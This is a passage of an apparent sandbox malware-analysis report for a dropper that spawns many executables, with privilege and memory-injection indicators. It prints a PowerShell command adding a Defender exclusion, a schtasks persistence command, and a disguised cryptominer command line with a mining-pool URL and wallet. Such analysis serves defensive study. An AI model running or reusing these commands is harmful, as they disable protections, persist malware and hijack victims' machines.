Token: SeChangeNotifyPrivilege	4584	Tue118f55232e4.exe
Token: SeRemoteShutdownPrivilege	4584	Tue118f55232e4.exe
Token: SeUndockPrivilege	4584	Tue118f55232e4.exe
Token: SeSyncAgentPrivilege	4584	Tue118f55232e4.exe
Token: SeEnableDelegationPrivilege	4584	Tue118f55232e4.exe
Token: SeManageVolumePrivilege	4584	Tue118f55232e4.exe
Token: SeImpersonatePrivilege	4584	Tue118f55232e4.exe
Token: SeCreateGlobalPrivilege	4584	Tue118f55232e4.exe
Token: 31	4584	Tue118f55232e4.exe
Token: 32	4584	Tue118f55232e4.exe
Token: 33	4584	Tue118f55232e4.exe
Token: 34	4584	Tue118f55232e4.exe
Token: 35	4584	Tue118f55232e4.exe
Token: SeDebugPrivilege	2144	Tue11f251db82fb7b.exe
Token: SeDebugPrivilege	4992	Tue11141271fbe5877f.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeRestorePrivilege	5652	WerFault.exe
Token: SeBackupPrivilege	5652	WerFault.exe
Token: SeBackupPrivilege	5652	WerFault.exe
Token: SeDebugPrivilege	5624	720985.exe
Token: SeDebugPrivilege	6004	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	4600	Tue11e4e580f2e8141a3.exe
Token: SeDebugPrivilege	4832	BearVpn 3.exe
Token: SeDebugPrivilege	5028	1541351.exe
Token: SeDebugPrivilege	5708	6661818.exe
Token: SeDebugPrivilege	2920	postback.exe
Token: SeDebugPrivilege	5508	46807GHF____.exe
Token: SeDebugPrivilege	5368	5303111.exe
Token: SeDebugPrivilege	724	1779428.exe
Token: SeDebugPrivilege	4644	6312160.exe
Token: SeIncreaseQuotaPrivilege	4560	powershell.exe
Token: SeSecurityPrivilege	4560	powershell.exe
Token: SeTakeOwnershipPrivilege	4560	powershell.exe
Token: SeLoadDriverPrivilege	4560	powershell.exe
Token: SeSystemProfilePrivilege	4560	powershell.exe
Token: SeSystemtimePrivilege	4560	powershell.exe
Token: SeProfSingleProcessPrivilege	4560	powershell.exe
Token: SeIncBasePriorityPrivilege	4560	powershell.exe
Token: SeCreatePagefilePrivilege	4560	powershell.exe
Token: SeBackupPrivilege	4560	powershell.exe
Token: SeRestorePrivilege	4560	powershell.exe
Token: SeShutdownPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
5140	setup_2.tmp
568	ultramediaburner.tmp
4860	installer.exe
5272	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4332	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3800 wrote to memory of 4984	3800	setup_x86_x64_install.exe	77
PID 3800 wrote to memory of 4984	3800	setup_x86_x64_install.exe	77
PID 3800 wrote to memory of 4984	3800	setup_x86_x64_install.exe	77
PID 4984 wrote to memory of 4148	4984	setup_installer.exe	78
PID 4984 wrote to memory of 4148	4984	setup_installer.exe	78
PID 4984 wrote to memory of 4148	4984	setup_installer.exe	78
PID 4148 wrote to memory of 4676	4148	setup_install.exe	82
PID 4148 wrote to memory of 4676	4148	setup_install.exe	82
PID 4148 wrote to memory of 4676	4148	setup_install.exe	82
PID 4148 wrote to memory of 4660	4148	setup_install.exe	83
PID 4148 wrote to memory of 4660	4148	setup_install.exe	83
PID 4148 wrote to memory of 4660	4148	setup_install.exe	83
PID 4148 wrote to memory of 4684	4148	setup_install.exe	84
PID 4148 wrote to memory of 4684	4148	setup_install.exe	84
PID 4148 wrote to memory of 4684	4148	setup_install.exe	84
PID 4148 wrote to memory of 4836	4148	setup_install.exe	85
PID 4148 wrote to memory of 4836	4148	setup_install.exe	85
PID 4148 wrote to memory of 4836	4148	setup_install.exe	85
PID 4148 wrote to memory of 4828	4148	setup_install.exe	89
PID 4148 wrote to memory of 4828	4148	setup_install.exe	89
PID 4148 wrote to memory of 4828	4148	setup_install.exe	89
PID 4148 wrote to memory of 3804	4148	setup_install.exe	86
PID 4148 wrote to memory of 3804	4148	setup_install.exe	86
PID 4148 wrote to memory of 3804	4148	setup_install.exe	86
PID 4148 wrote to memory of 5020	4148	setup_install.exe	88
PID 4148 wrote to memory of 5020	4148	setup_install.exe	88
PID 4148 wrote to memory of 5020	4148	setup_install.exe	88
PID 4836 wrote to memory of 2144	4836	cmd.exe	87
PID 4836 wrote to memory of 2144	4836	cmd.exe	87
PID 4148 wrote to memory of 1104	4148	setup_install.exe	90
PID 4148 wrote to memory of 1104	4148	setup_install.exe	90
PID 4148 wrote to memory of 1104	4148	setup_install.exe	90
PID 4148 wrote to memory of 812	4148	setup_install.exe	92
PID 4148 wrote to memory of 812	4148	setup_install.exe	92
PID 4148 wrote to memory of 812	4148	setup_install.exe	92
PID 4148 wrote to memory of 2400	4148	setup_install.exe	91
PID 4148 wrote to memory of 2400	4148	setup_install.exe	91
PID 4148 wrote to memory of 2400	4148	setup_install.exe	91
PID 4660 wrote to memory of 4804	4660	cmd.exe	104
PID 4660 wrote to memory of 4804	4660	cmd.exe	104
PID 4660 wrote to memory of 4804	4660	cmd.exe	104
PID 4828 wrote to memory of 5080	4828	cmd.exe	93
PID 4828 wrote to memory of 5080	4828	cmd.exe	93
PID 4828 wrote to memory of 5080	4828	cmd.exe	93
PID 3804 wrote to memory of 4856	3804	cmd.exe	101
PID 3804 wrote to memory of 4856	3804	cmd.exe	101
PID 3804 wrote to memory of 4856	3804	cmd.exe	101
PID 2400 wrote to memory of 4868	2400	cmd.exe	99
PID 2400 wrote to memory of 4868	2400	cmd.exe	99
PID 2400 wrote to memory of 4868	2400	cmd.exe	99
PID 1104 wrote to memory of 4992	1104	cmd.exe	100
PID 1104 wrote to memory of 4992	1104	cmd.exe	100
PID 4684 wrote to memory of 4724	4684	cmd.exe	103
PID 4684 wrote to memory of 4724	4684	cmd.exe	103
PID 4684 wrote to memory of 4724	4684	cmd.exe	103
PID 5020 wrote to memory of 5008	5020	cmd.exe	94
PID 5020 wrote to memory of 5008	5020	cmd.exe	94
PID 5020 wrote to memory of 5008	5020	cmd.exe	94
PID 812 wrote to memory of 4584	812	cmd.exe	98
PID 812 wrote to memory of 4584	812	cmd.exe	98
PID 812 wrote to memory of 4584	812	cmd.exe	98
PID 4676 wrote to memory of 4560	4676	cmd.exe	97
PID 4676 wrote to memory of 4560	4676	cmd.exe	97
PID 4676 wrote to memory of 4560	4676	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3800
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4984
- - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4676
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4660
    - - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11d7385a978cc.exe
        
        Tue11d7385a978cc.exe
        5⤵
        Executes dropped EXE
        
        PID:4804
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11b9d76a96506.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4684
    - - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11b9d76a96506.exe
        
        Tue11b9d76a96506.exe
        5⤵
        Executes dropped EXE
        
        PID:4724
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4836
    - - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11f251db82fb7b.exe
        
        Tue11f251db82fb7b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5944
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:5100
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:1048
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5280
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:6840
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:6904
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:6932
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:6244
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:6004
        
        C:\Users\Admin\AppData\Roaming\1541351.exe
        
        "C:\Users\Admin\AppData\Roaming\1541351.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5028
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5028 -s 2332
        9⤵
        Program crash
        Enumerates system info in registry
        
        PID:7100
        
        C:\Users\Admin\AppData\Roaming\8651726.exe
        
        "C:\Users\Admin\AppData\Roaming\8651726.exe"
        8⤵
        Executes dropped EXE
        
        PID:6020
        
        C:\Users\Admin\AppData\Roaming\4421370.exe
        
        "C:\Users\Admin\AppData\Roaming\4421370.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        
        PID:5864
        
        C:\Users\Admin\AppData\Roaming\8190389.exe
        
        "C:\Users\Admin\AppData\Roaming\8190389.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        
        PID:5172
        
        C:\Users\Admin\AppData\Roaming\6358932.exe
        
        "C:\Users\Admin\AppData\Roaming\6358932.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1200
        
        C:\Users\Admin\AppData\Roaming\5303111.exe
        
        "C:\Users\Admin\AppData\Roaming\5303111.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5368
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 2400
        9⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6936
        
        C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"
        7⤵
        Executes dropped EXE
        
        PID:6072
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 284
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1160
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        
        PID:4600
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4600 -s 1736
        8⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 608
        8⤵
        Program crash
        
        PID:5876
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:1884
        
        C:\Users\Admin\AppData\Local\Temp\is-O9SOC.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-O9SOC.tmp\setup_2.tmp" /SL5="$1E001E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:3236
        
        C:\Users\Admin\AppData\Local\Temp\is-MOLGE.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MOLGE.tmp\setup_2.tmp" /SL5="$2026A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:5140
        
        C:\Users\Admin\AppData\Local\Temp\is-MMLOR.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-MMLOR.tmp\postback.exe" ss1
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:5844
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3804
    - - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11bc0507b56295.exe
        
        Tue11bc0507b56295.exe
        5⤵
        Executes dropped EXE
        
        PID:4856
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4856 -s 280
        6⤵
        Program crash
        
        PID:5644
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5020
    - - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        Tue11e4e580f2e8141a3.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5008
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5416
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:788
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5620
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4732
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4868
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4908
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:816
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5480
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4600
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:5572
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1392
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4596
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:2000
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5364
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5096
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5876
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4992
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4812
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6224
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6776
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6204
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3088
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7104
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6684
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7096
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6756
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7084
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7004
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2016
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6848
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5932
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6636
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5652
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1760
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5256
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4400
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7056
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1760
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1604
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6028
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:132
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6628
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1568
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6448
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1484
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6544
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6752
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1624
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4624
